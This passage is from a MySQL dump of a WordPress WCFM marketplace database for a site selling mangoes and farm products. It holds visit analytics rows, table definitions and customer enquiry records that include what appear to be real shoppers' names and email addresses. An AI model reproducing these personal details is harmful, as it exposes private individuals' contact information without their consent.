09:35:37'),(3493,1,0,0,0,1,'','3.110.242.160','','','','2025-03-24 11:41:46'),(3494,1,0,0,0,1,'','3.110.242.160','','','','2025-03-24 13:10:29'),(3495,9,0,0,85,1,'','3.110.242.160','','','','2025-03-24 16:00:09'),(3496,9,0,0,85,1,'','3.110.242.160','','','','2025-03-25 07:32:38'),(3497,0,0,1,1755,1,'','3.110.242.160','','','','2025-03-25 23:39:40'),(3498,1,0,0,0,1,'','3.110.242.160','','','','2025-03-26 03:25:05'),(3499,0,0,1,1775,1,'','3.110.242.160','','','','2025-03-26 11:21:38'),(3500,1,0,0,0,1,'','3.110.242.160','','','','2025-03-26 12:11:40'),(3501,1,0,0,0,1,'www.google.com','3.110.242.160','','','','2025-03-27 11:48:03'),(3502,0,0,1,1775,1,'','3.110.242.160','','','','2025-03-27 21:38:25'),(3503,1,0,0,0,1,'','3.110.242.160','','','','2025-03-28 03:22:58'),(3504,0,0,1,1786,1,'','3.110.242.160','','','','2025-03-28 17:58:00'),(3505,1,0,0,0,1,'','3.110.242.160','','','','2025-03-28 19:15:41'),(3506,0,0,1,1786,1,'','3.110.242.160','','','','2025-03-29 01:49:53'),(3507,9,0,0,85,1,'','3.110.242.160','','','','2025-03-29 02:26:38'),(3508,9,0,0,135,1,'','3.110.242.160','','','','2025-03-29 02:30:56'),(3509,1,0,0,0,1,'','3.110.242.160','','','','2025-03-29 02:49:06'),(3510,9,0,0,136,1,'','3.110.242.160','','','','2025-03-29 02:57:11'),(3511,1,0,0,0,1,'http://gopalak.in','3.110.242.160','','','','2025-03-29 18:46:33'),(3512,1,0,0,0,1,'','3.110.242.160','','','','2025-03-30 16:51:45'),(3513,0,0,1,1786,1,'','3.110.242.160','','','','2025-03-30 16:52:16'),(3514,0,0,1,1755,1,'','3.110.242.160','','','','2025-03-30 16:56:30'),(3515,0,1,0,0,21,'','3.110.242.160','','','','2025-03-30 16:57:10'),(3516,9,0,0,85,1,'','3.110.242.160','','','','2025-03-30 16:57:41'),(3517,9,0,0,136,1,'','3.110.242.160','','','','2025-03-30 16:58:03'),(3518,9,0,0,135,1,'','3.110.242.160','','','','2025-03-30 16:58:13'),(3519,0,0,1,1775,1,'','3.110.242.160','','','','2025-03-30 17:09:00'),(3520,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2025-03-31 15:31:20'),(3521,0,0,1,1775,1,'','3.110.242.160','','','','2025-04-01 00:43:59'),(3522,0,0,1,1755,1,'','3.110.242.160','','','','2025-04-01 00:44:01'),(3523,0,0,1,1786,1,'','3.110.242.160','','','','2025-04-01 00:45:49'),(3524,9,0,0,135,1,'','3.110.242.160','','','','2025-04-01 00:48:28'),(3525,9,0,0,135,1,'','3.110.242.160','','','','2025-04-01 00:48:56'),(3526,0,0,1,1775,1,'','3.110.242.160','','','','2025-04-01 00:49:07'),(3527,0,0,1,1755,1,'','3.110.242.160','','','','2025-04-01 00:49:09'),(3528,9,0,0,136,1,'','3.110.242.160','','','','2025-04-01 00:49:14'),(3529,9,0,0,85,1,'','3.110.242.160','','','','2025-04-01 00:49:25'),(3530,9,0,0,136,1,'','3.110.242.160','','','','2025-04-01 00:49:40'),(3531,9,0,0,136,1,'','3.110.242.160','','','','2025-04-01 00:49:43'),(3532,1,0,0,0,1,'','3.110.242.160','','','','2025-04-01 07:39:36'),(3533,1,0,0,0,1,'','3.110.242.160','','','','2025-04-01 08:47:56'),(3534,9,0,0,136,1,'','3.110.242.160','','','','2025-04-01 09:48:39'),(3535,1,0,0,0,1,'','3.110.242.160','','','','2025-04-01 14:13:08'),(3536,9,0,0,135,1,'','3.110.242.160','','','','2025-04-02 00:15:57'),(3537,9,0,0,85,1,'','3.110.242.160','','','','2025-04-02 08:32:37'),(3538,0,0,1,1786,1,'','3.110.242.160','','','','2025-04-02 09:01:50'),(3539,0,0,1,1755,1,'','3.110.242.160','','','','2025-04-02 09:32:34'),(3540,1,0,0,0,1,'','3.110.242.160','','','','2025-04-03 03:11:46'),(3541,1,0,0,0,1,'https://gopalak.in/shop','3.110.242.160','','','','2025-04-03 03:47:03'),(3542,9,0,0,135,1,'','3.110.242.160','','','','2025-04-03 09:59:19'),(3543,1,0,0,0,1,'','3.110.242.160','','','','2025-04-03 13:31:47'),(3544,1,0,0,0,1,'','3.110.242.160','','','','2025-04-03 18:11:50'),(3545,0,0,1,1786,1,'https://gopalak.in/product/cattle','3.110.242.160','','','','2025-04-03 22:45:34'),(3546,0,0,1,1755,1,'https://gopalak.in/product/cow','3.110.242.160','','','','2025-04-03 22:45:35'),(3547,9,0,0,135,1,'https://gopalak.in/product-category/organic-fertilizer-repellent','3.110.242.160','','','','2025-04-03 22:52:15'),(3548,0,0,1,1775,1,'https://gopalak.in/product/abc','3.110.242.160','','','','2025-04-03 22:59:51'),(3549,9,0,0,136,1,'https://gopalak.in/product-category/donation','3.110.242.160','','','','2025-04-03 23:08:40'),(3550,1,0,0,0,1,'','3.110.242.160','','','','2025-04-03 23:10:11'),(3551,1,0,0,0,1,'','3.110.242.160','','','','2025-04-03 23:10:11'),(3552,1,0,0,0,1,'','3.110.242.160','','','','2025-04-03 23:20:54'),(3553,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2025-04-04 06:13:29'),(3554,0,0,1,1775,1,'https://gopalak.in/?p=1775','3.110.242.160','','','','2025-04-04 15:44:31'),(3555,0,0,1,1775,1,'','3.110.242.160','','','','2025-04-04 15:47:20'),(3556,9,0,0,135,1,'','3.110.242.160','','','','2025-04-04 16:22:09'),(3557,0,0,1,1755,1,'','3.110.242.160','','','','2025-04-04 16:32:14'),(3558,0,0,1,1786,1,'https://gopalak.in/?p=1786','3.110.242.160','','','','2025-04-04 16:34:21'),(3559,9,0,0,136,1,'','3.110.242.160','','','','2025-04-04 16:53:03'),(3560,9,0,0,136,1,'','3.110.242.160','','','','2025-04-04 17:17:02'),(3561,0,0,1,1755,1,'https://gopalak.in/?p=1755','3.110.242.160','','','','2025-04-04 17:22:16'),(3562,1,0,0,0,1,'','3.110.242.160','','','','2025-04-05 19:56:20'),(3563,0,0,1,1755,1,'','3.110.242.160','','','','2025-04-05 19:59:04'),(3564,9,0,0,136,1,'','3.110.242.160','','','','2025-04-05 21:37:36'),(3565,0,0,1,1786,1,'','3.110.242.160','','','','2025-04-06 06:01:36'),(3566,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2025-04-06 06:30:55'),(3567,0,0,1,1755,1,'https://gopalak.in/shop/','3.110.242.160','','','','2025-04-06 06:35:30'),(3568,0,0,1,1775,1,'','3.110.242.160','','','','2025-04-06 11:26:03'),(3569,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2025-04-06 11:38:31'),(3570,9,0,0,135,1,'','3.110.242.160','','','','2025-04-07 03:09:15'),(3571,9,0,0,85,1,'','3.110.242.160','','','','2025-04-07 03:42:22'),(3572,0,0,1,1755,1,'','3.110.242.160','','','','2025-04-07 04:08:51'),(3573,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2025-04-07 06:03:47'),(3574,9,0,0,136,1,'','3.110.242.160','','','','2025-04-07 07:37:01'),(3575,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2025-04-08 05:01:26'),(3576,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2025-04-08 10:08:58'),(3577,0,0,1,1755,1,'https://gopalak.in/shop/','3.110.242.160','','','','2025-04-08 13:54:51'),(3578,9,0,0,85,1,'','3.110.242.160','','','','2025-04-08 15:44:11'),(3579,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2025-04-09 07:06:24'),(3580,0,0,1,1755,1,'','3.110.242.160','','','','2025-04-09 14:53:48'),(3581,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2025-04-09 17:09:12'),(3582,0,0,1,1775,1,'','3.110.242.160','','','','2025-04-10 05:13:37'),(3583,9,0,0,85,1,'','3.110.242.160','','','','2025-04-10 22:01:26'),(3584,9,0,0,85,1,'','3.110.242.160','','','','2025-04-11 02:16:29'),(3585,0,0,1,1786,1,'','3.110.242.160','','','','2025-04-11 04:21:28'),(3586,1,0,0,0,1,'','3.110.242.160','','','','2025-04-11 07:26:59'),(3587,9,0,0,136,1,'','3.110.242.160','','','','2025-04-11 09:26:14'),(3588,9,0,0,135,1,'','3.110.242.160','','','','2025-04-11 18:32:22'),(3589,1,0,0,0,1,'','3.110.242.160','','','','2025-04-12 10:02:52'),(3590,0,0,1,1755,1,'','3.110.242.160','','','','2025-04-12 14:53:07'),(3591,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2025-04-12 21:48:31'),(3592,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2025-04-13 08:51:51'),(3593,0,0,1,1786,1,'','3.110.242.160','','','','2025-04-13 11:20:25'),(3594,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2025-04-13 15:37:08'),(3595,1,0,0,0,1,'https://www.google.com/','3.110.242.160','','','','2025-04-14 05:17:04'),(3596,9,0,0,135,1,'','3.110.242.160','','','','2025-04-15 00:57:25'),(3597,1,0,0,0,1,'','3.110.242.160','','','','2025-04-15 23:42:54'),(3598,0,0,1,1755,1,'','3.110.242.160','','','','2025-04-16 00:39:28'),(3599,9,0,0,136,1,'','3.110.242.160','','','','2025-04-16 01:13:11'),(3600,0,0,1,1786,1,'','3.110.242.160','','','','2025-04-16 01:32:36'),(3601,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2025-04-16 07:58:46'),(3602,0,0,1,1786,1,'https://gopalak.in/shop/','3.110.242.160','','','','2025-04-16 07:58:52'),(3603,9,0,0,135,1,'','3.110.242.160','','','','2025-04-17 03:33:35'),(3604,1,0,0,0,1,'','3.110.242.160','','','','2025-04-17 04:22:33'),(3605,0,0,1,1755,1,'','3.110.242.160','','','','2025-04-17 04:46:47'),(3606,0,0,1,1775,1,'','3.110.242.160','','','','2025-04-17 04:47:11'),(3607,0,0,1,1786,1,'','3.110.242.160','','','','2025-04-17 05:22:07'),(3608,1,0,0,0,1,'','3.110.242.160','','','','2025-04-17 05:57:18'),(3609,1,0,0,0,1,'','3.110.242.160','','','','2025-04-17 06:22:27'),(3610,1,0,0,0,1,'','3.110.242.160','','','','2025-04-17 06:26:59'),(3611,9,0,0,135,1,'','3.110.242.160','','','','2025-04-17 07:07:00'),(3612,9,0,0,135,1,'','3.110.242.160','','','','2025-04-17 07:16:11'),(3613,0,0,1,1755,1,'','3.110.242.160','','','','2025-04-17 07:28:55'),(3614,0,0,1,1775,1,'','3.110.242.160','','','','2025-04-17 07:29:20'),(3615,9,0,0,136,1,'','3.110.242.160','','','','2025-04-17 07:33:37'),(3616,9,0,0,85,1,'','3.110.242.160','','','','2025-04-17 07:39:14'),(3617,9,0,0,136,1,'','3.110.242.160','','','','2025-04-17 07:43:52'),(3618,9,0,0,136,1,'','3.110.242.160','','','','2025-04-17 07:44:16'),(3619,0,0,1,1775,1,'','3.110.242.160','','','','2025-04-17 10:16:45'),(3620,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2025-04-17 12:25:15'),(3621,0,0,1,1786,1,'https://gopalak.in/shop/','3.110.242.160','','','','2025-04-17 12:25:20'),(3622,9,0,0,136,1,'','3.110.242.160','','','','2025-04-17 14:15:30'),(3623,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2025-04-17 14:25:49'),(3624,9,0,0,136,1,'','3.110.242.160','','','','2025-04-17 16:52:53'),(3625,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2025-04-18 08:34:59'),(3626,0,0,1,1786,1,'https://gopalak.in/shop/','3.110.242.160','','','','2025-04-18 08:35:05'),(3627,9,0,0,136,1,'https://gopalak.in/shop/','3.110.242.160','','','','2025-04-18 10:16:50'),(3628,0,0,1,1755,1,'','3.110.242.160','','','','2025-04-18 20:46:17'),(3629,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2025-04-19 09:16:52'),(3630,0,0,1,1786,1,'https://gopalak.in/shop/','3.110.242.160','','','','2025-04-19 12:05:47'),(3631,0,0,1,1755,1,'https://gopalak.in/shop/','3.110.242.160','','','','2025-04-19 12:05:52'),(3632,1,0,0,0,1,'','3.110.242.160','','','','2025-04-19 17:59:24'),(3633,9,0,0,85,1,'','3.110.242.160','','','','2025-04-19 17:59:27'),(3634,0,0,1,1786,1,'','3.110.242.160','','','','2025-04-19 17:59:27'),(3635,1,0,0,0,1,'','3.110.242.160','','','','2025-04-19 17:59:34'),(3636,9,0,0,135,1,'','3.110.242.160','','','','2025-04-19 17:59:35'),(3637,9,0,0,135,1,'','3.110.242.160','','','','2025-04-19 17:59:38'),(3638,0,0,1,1775,1,'','3.110.242.160','','','','2025-04-19 17:59:41'),(3639,1,0,0,0,1,'','3.110.242.160','','','','2025-04-19 17:59:44'),(3640,9,0,0,136,1,'','3.110.242.160','','','','2025-04-19 17:59:47'),(3641,9,0,0,136,1,'','3.110.242.160','','','','2025-04-19 17:59:51'),(3642,9,0,0,136,1,'','3.110.242.160','','','','2025-04-19 17:59:51'),(3643,0,0,1,1755,1,'','3.110.242.160','','','','2025-04-19 17:59:54'),(3644,0,0,1,1755,1,'','3.110.242.160','','','','2025-04-19 17:59:58'),(3645,1,0,0,0,1,'','3.110.242.160','','','','2025-04-21 04:26:02'),(3646,9,0,0,136,1,'','3.110.242.160','','','','2025-04-21 06:33:48'),(3647,0,0,1,1755,1,'https://gopalak.in/shop/','3.110.242.160','','','','2025-04-21 07:20:26'),(3648,1,0,0,0,1,'https://gopalak.in/shop/','3.110.242.160','','','','2025-04-21 07:20:28'),(3649,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2025-04-21 16:01:24'),(3650,0,0,1,1786,1,'https://gopalak.in/shop/','3.110.242.160','','','','2025-04-21 16:01:34'),(3651,9,0,0,135,1,'https://gopalak.in/shop/','3.110.242.160','','','','2025-04-21 16:01:59'),(3652,9,0,0,136,1,'','3.110.242.160','','','','2025-04-21 16:19:46'),(3653,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2025-04-21 19:15:25'),(3654,9,0,0,135,1,'','3.110.242.160','','','','2025-04-21 21:46:44'),(3655,9,0,0,85,1,'','3.110.242.160','','','','2025-04-21 21:54:06'),(3656,9,0,0,135,1,'','3.110.242.160','','','','2025-04-21 22:36:54'),(3657,0,0,1,1775,1,'','3.110.242.160','','','','2025-04-22 05:04:43'),(3658,0,0,1,1775,1,'','3.110.242.160','','','','2025-04-22 15:25:52'),(3659,0,0,1,1786,1,'','3.110.242.160','','','','2025-04-22 16:09:29'),(3660,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2025-04-23 08:56:05'),(3661,0,0,1,1786,1,'https://gopalak.in/shop/','3.110.242.160','','','','2025-04-23 08:56:48'),(3662,1,0,0,0,1,'','3.110.242.160','','','','2025-04-23 08:56:57'),(3663,9,0,0,136,1,'','3.110.242.160','','','','2025-04-25 07:38:39'),(3664,0,0,1,1755,1,'','3.110.242.160','','','','2025-04-25 07:39:06'),(3665,9,0,0,85,1,'','3.110.242.160','','','','2025-04-25 07:43:16'),(3666,9,0,0,135,1,'','3.110.242.160','','','','2025-04-25 07:44:46'),(3667,0,0,1,1775,1,'','3.110.242.160','','','','2025-04-25 07:47:53'),(3668,0,0,1,1786,1,'','3.110.242.160','','','','2025-04-25 07:48:34'),(3669,1,0,0,0,1,'','3.110.242.160','','','','2025-04-25 07:49:04'),(3670,0,1,0,0,21,'','3.110.242.160','','','','2025-04-25 07:50:49'),(3671,1,0,0,0,1,'','3.110.242.160','','','','2025-04-25 16:32:04'),(3672,0,0,1,1755,1,'','3.110.242.160','','','','2025-04-25 17:34:59'),(3673,9,0,0,136,1,'','3.110.242.160','','','','2025-04-25 18:29:45'),(3674,0,0,1,1775,1,'','3.110.242.160','','','','2025-04-25 18:42:28'),(3675,0,0,1,1775,1,'','3.110.242.160','','','','2025-04-25 19:47:36'),(3676,1,0,0,0,1,'','3.110.242.160','','','','2025-04-25 22:52:36'),(3677,9,0,0,136,1,'','3.110.242.160','','','','2025-04-26 00:22:15'),(3678,9,0,0,135,1,'','3.110.242.160','','','','2025-04-26 10:31:24'),(3679,9,0,0,85,1,'','3.110.242.160','','','','2025-04-26 15:15:48'),(3680,0,0,1,1786,1,'','3.110.242.160','','','','2025-04-26 17:10:23'),(3681,0,0,1,1775,1,'','3.110.242.160','','','','2025-04-26 17:31:44'),(3682,0,0,1,1755,1,'','3.110.242.160','','','','2025-04-26 18:03:18'),(3683,1,0,0,0,1,'','3.110.242.160','','','','2025-04-27 00:34:19'),(3684,9,0,0,135,1,'','3.110.242.160','','','','2025-04-27 00:36:08'),(3685,0,0,1,1786,1,'','3.110.242.160','','','','2025-04-27 01:41:28'),(3686,9,0,0,85,1,'','3.110.242.160','','','','2025-04-27 02:07:26'),(3687,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2025-04-27 05:55:22'),(3688,1,0,0,0,1,'','3.110.242.160','','','','2025-04-27 10:49:08'),(3689,1,0,0,0,1,'','3.110.242.160','','','','2025-04-27 21:53:28'),(3690,1,0,0,0,1,'','3.110.242.160','','','','2025-04-28 00:00:41'),(3691,9,0,0,136,1,'','3.110.242.160','','','','2025-04-28 04:17:49'),(3692,9,0,0,136,1,'','3.110.242.160','','','','2025-04-28 07:15:26'),(3693,0,0,1,1755,1,'','3.110.242.160','','','','2025-04-28 19:54:20'),(3694,0,0,1,1775,1,'','3.110.242.160','','','','2025-04-28 21:43:07'),(3695,9,0,0,135,1,'','3.110.242.160','','','','2025-04-29 03:25:37'),(3696,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2025-04-29 05:58:40'),(3697,0,0,1,1786,1,'https://gopalak.in/shop/','3.110.242.160','','','','2025-04-29 05:58:45'),(3698,0,0,1,1775,1,'','3.110.242.160','','','','2025-04-29 17:58:12'),(3699,0,0,1,1755,1,'','3.110.242.160','','','','2025-04-29 18:02:43'),(3700,1,0,0,0,1,'','3.110.242.160','','','','2025-04-29 18:15:42'),(3701,1,0,0,0,1,'','3.110.242.160','','','','2025-04-30 17:37:45'),(3702,0,0,1,1755,1,'','3.110.242.160','','','','2025-04-30 18:35:14'),(3703,1,0,0,0,1,'','3.110.242.160','','','','2025-04-30 22:11:08'),(3704,0,0,1,1755,1,'','3.110.242.160','','','','2025-05-01 04:41:25'),(3705,9,0,0,136,1,'','3.110.242.160','','','','2025-05-01 18:36:40'),(3706,9,0,0,135,1,'','3.110.242.160','','','','2025-05-01 19:18:36'),(3707,0,0,1,1786,1,'','3.110.242.160','','','','2025-05-01 19:50:30'),(3708,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2025-05-02 03:15:29'),(3709,0,0,1,1786,1,'https://gopalak.in/shop/','3.110.242.160','','','','2025-05-02 03:15:34'),(3710,9,0,0,85,1,'','3.110.242.160','','','','2025-05-02 05:56:56'),(3711,1,0,0,0,1,'','3.110.242.160','','','','2025-05-03 15:18:29'),(3712,0,0,1,1755,1,'https://gopalak.in/home/','3.110.242.160','','','','2025-05-04 03:37:46'),(3713,9,0,0,135,1,'https://gopalak.in/home/','3.110.242.160','','','','2025-05-04 03:37:54'),(3714,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2025-05-04 12:54:24'),(3715,0,0,1,1786,1,'https://gopalak.in/shop/','3.110.242.160','','','','2025-05-04 12:56:03'),(3716,1,0,0,0,1,'','3.110.242.160','','','','2025-05-05 21:47:19'),(3717,1,0,0,0,1,'','3.110.242.160','','','','2025-05-06 06:07:10'),(3718,0,0,1,1755,1,'','3.110.242.160','','','','2025-05-06 07:07:30'),(3719,0,0,1,1775,1,'https://gopalak.in/home/','3.110.242.160','','','','2025-05-06 13:03:38'),(3720,9,0,0,135,1,'','3.110.242.160','','','','2025-05-07 01:11:14'),(3721,0,0,1,1755,1,'','3.110.242.160','','','','2025-05-07 07:42:33'),(3722,0,0,1,1775,1,'','3.110.242.160','','','','2025-05-07 08:59:49'),(3723,9,0,0,136,1,'','3.110.242.160','','','','2025-05-07 10:04:35'),(3724,9,0,0,85,1,'','3.110.242.160','','','','2025-05-07 10:11:00'),(3725,9,0,0,136,1,'','3.110.242.160','','','','2025-05-07 10:52:51'),(3726,1,0,0,0,1,'','3.110.242.160','','','','2025-05-07 15:49:44'),(3727,0,0,1,1755,1,'','3.110.242.160','','','','2025-05-08 04:19:17'),(3728,1,0,0,0,1,'','3.110.242.160','','','','2025-05-09 01:14:37'),(3729,0,1,0,0,21,'','3.110.242.160','','','','2025-05-09 22:44:09'),(3730,9,0,0,85,1,'','3.110.242.160','','','','2025-05-10 11:15:39'),(3731,0,0,1,1755,1,'','3.110.242.160','','','','2025-05-10 14:20:20'),(3732,1,0,0,0,1,'','3.110.242.160','','','','2025-05-11 01:35:19'),(3733,0,0,1,1775,1,'','3.110.242.160','','','','2025-05-11 02:38:03'),(3734,1,0,0,0,1,'http://www.google.com.hk','3.110.242.160','','','','2025-05-11 16:21:16'),(3735,9,0,0,136,1,'','3.110.242.160','','','','2025-05-12 05:49:30'),(3736,9,0,0,135,1,'','3.110.242.160','','','','2025-05-12 05:59:35'),(3737,9,0,0,136,1,'','3.110.242.160','','','','2025-05-12 06:40:41'),(3738,0,0,1,1755,1,'','3.110.242.160','','','','2025-05-13 17:23:50'),(3739,0,0,1,1755,1,'','3.110.242.160','','','','2025-05-14 02:21:02'),(3740,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2025-05-14 07:30:01'),(3741,0,1,0,0,21,'','3.110.242.160','','','','2025-05-15 05:26:10'),(3742,1,0,0,0,1,'','2a01:4f9:3051:1766::2','','','','2025-05-16 07:29:14'),(3743,0,0,1,1786,1,'','2a01:4f9:3051:1766::2','','','','2025-05-16 10:29:17'),(3744,9,0,0,136,1,'','2a01:4f9:3051:1766::2','','','','2025-05-16 18:03:34');
/*!40000 ALTER TABLE `wp_wcfm_detailed_analysis` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wcfm_enquiries`
--

DROP TABLE IF EXISTS `wp_wcfm_enquiries`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wcfm_enquiries` (
  `ID` bigint(20) NOT NULL AUTO_INCREMENT,
  `enquiry` longtext NOT NULL,
  `reply` longtext NOT NULL,
  `product_id` bigint(20) NOT NULL DEFAULT 0,
  `author_id` bigint(20) NOT NULL DEFAULT 0,
  `vendor_id` bigint(20) NOT NULL DEFAULT 0,
  `customer_id` bigint(20) NOT NULL DEFAULT 0,
  `customer_name` varchar(200) NOT NULL,
  `customer_email` varchar(200) NOT NULL,
  `reply_by` bigint(20) NOT NULL DEFAULT 0,
  `is_private` tinyint(1) NOT NULL DEFAULT 0,
  `posted` timestamp NOT NULL DEFAULT current_timestamp(),
  `replied` date NOT NULL DEFAULT '0000-00-00',
  PRIMARY KEY (`ID`)
) ENGINE=InnoDB AUTO_INCREMENT=7 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wcfm_enquiries`
--

LOCK TABLES `wp_wcfm_enquiries` WRITE;
/*!40000 ALTER TABLE `wp_wcfm_enquiries` DISABLE KEYS */;
INSERT INTO `wp_wcfm_enquiries` VALUES (1,'asa','',637,5,5,1,'admin ','mango@homedirect.in',0,1,'2022-02-17 11:36:54','2022-02-17'),(2,'hi','<p>hello</p>',590,2,2,21,'bavani p','bhavani@utfindia.in',1,1,'2022-02-24 10:41:33','2022-02-24'),(3,'testing','<p>hi test</p>',1194,25,25,27,'rakshithasj1999','rakshithasj1999@gmail.com',1,1,'2022-03-14 05:06:16','2022-03-14'),(4,'we need alphonso , when it can be delivred if you book today.','',1288,21,21,0,'Sethu Rani','shisou1616@gmail.com',0,1,'2022-03-22 09:37:03','2022-03-22'),(5,'Advice me the sweetest mango so that i can decide','',1116,21,21,0,'Rajesh','RAJESHNAYAK16@GMAIL.COM',0,1,'2022-04-11 13:59:15','2022-04-11'),(6,'Looking for raspuri and badami','',1132,21,21,0,'Shreyaswini KR','shreyu2003@gmail.com',0,1,'2022-04-21 17:57:58','2022-04-21');
/*!40000 ALTER TABLE `wp_wcfm_enquiries` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wcfm_enquiries_meta`
--

DROP TABLE IF EXISTS `wp_wcfm_enquiries_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wcfm_enquiries_meta` (
  `ID` bigint(20) NOT NULL AUTO_INCREMENT,
  `enquiry_id` bigint(20) NOT NULL DEFAULT 0,
  `key` varchar(200) NOT NULL,
  `value` longtext NOT NULL,
  PRIMARY KEY (`ID`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wcfm_enquiries_meta`
--

LOCK TABLES `wp_wcfm_enquiries_meta` WRITE;
/*!40000 ALTER TABLE `wp_wcfm_enquiries_meta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wcfm_enquiries_meta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wcfm_enquiries_response`
--

DROP TABLE IF EXISTS `wp_wcfm_enquiries_response`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wcfm_enquiries_response` (
  `ID` bigint(20) NOT NULL AUTO_INCREMENT,
  `enquiry_id` bigint(20) NOT NULL DEFAULT 0,
  `product_id` bigint(20) NOT NULL DEFAULT 0,
  `vendor_id` bigint(20) NOT NULL DEFAULT 0,
  `customer_id` bigint(20) NOT NULL DEFAULT 0,
  `customer_name` varchar(200) NOT NULL,
  `customer_email` varchar(200) NOT NULL,
  `reply` longtext NOT NULL,
  `reply_by` bigint(20) NOT NULL DEFAULT 0,
  `posted` timestamp NOT NULL DEFAULT current_timestamp(),
  PRIMARY KEY (`ID`)
) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wcfm_enquiries_response`
--

LOCK TABLES `wp_wcfm_enquiries_response` WRITE;
/*!40000 ALTER TABLE `wp_wcfm_enquiries_response` DISABLE KEYS */;
INSERT INTO `wp_wcfm_enquiries_response` VALUES (1,2,590,2,21,'bavani p','bhavani@utfindia.in','<p>hello</p>',1,'2022-02-24 10:43:22'),(2,3,1194,25,27,'rakshithasj1999','rakshithasj1999@gmail.com','<p>hi test</p>',1,'2022-03-14 05:07:53');
/*!40000 ALTER TABLE `wp_wcfm_enquiries_response` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wcfm_enquiries_response_meta`
--

DROP TABLE IF EXISTS `wp_wcfm_enquiries_response_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wcfm_enquiries_response_meta` (
  `ID` bigint(20) NOT NULL AUTO_INCREMENT,
  `enquiry_response_id` bigint(20) NOT NULL DEFAULT 0,
  `key` varchar(200) NOT NULL,
  `value` longtext NOT NULL,
  PRIMARY KEY (`ID`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wcfm_enquiries_response_meta`
--

LOCK TABLES `wp_wcfm_enquiries_response_meta` WRITE;
/*!40000 ALTER TABLE `wp_wcfm_enquiries_response_meta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wcfm_enquiries_response_meta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wcfm_fbc_chat_rows`
--

DROP TABLE IF EXISTS `wp_wcfm_fbc_chat_rows`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wcfm_fbc_chat_rows` (
  `message_id` varchar(30) NOT NULL DEFAULT '',
  `conversation_id` varchar(30) NOT NULL,
  `user_id` varchar(30) NOT NULL DEFAULT '',
  `user_name` varchar(32) DEFAULT NULL,
  `msg` text NOT NULL,
  `msg_time` bigint(13) unsigned NOT NULL,
  UNIQUE KEY `message_id` (`message_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wcfm_fbc_chat_rows`
--

LOCK TABLES `wp_wcfm_fbc_chat_rows` WRITE;
/*!40000 ALTER TABLE `wp_wcfm_fbc_chat_rows` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wcfm_fbc_chat_rows` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wcfm_fbc_chat_sessions`
--

DROP TABLE IF EXISTS `wp_wcfm_fbc_chat_sessions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wcfm_fbc_chat_sessions` (
  `conversation_id` varchar(30) NOT NULL DEFAULT '',
  `user_id` varchar(30) NOT NULL DEFAULT '',
  `evaluation` varchar(30) NOT NULL DEFAULT '',
  `created_at` bigint(13) unsigned NOT NULL,
  `duration` varchar(30) NOT NULL DEFAULT '00:00:00',
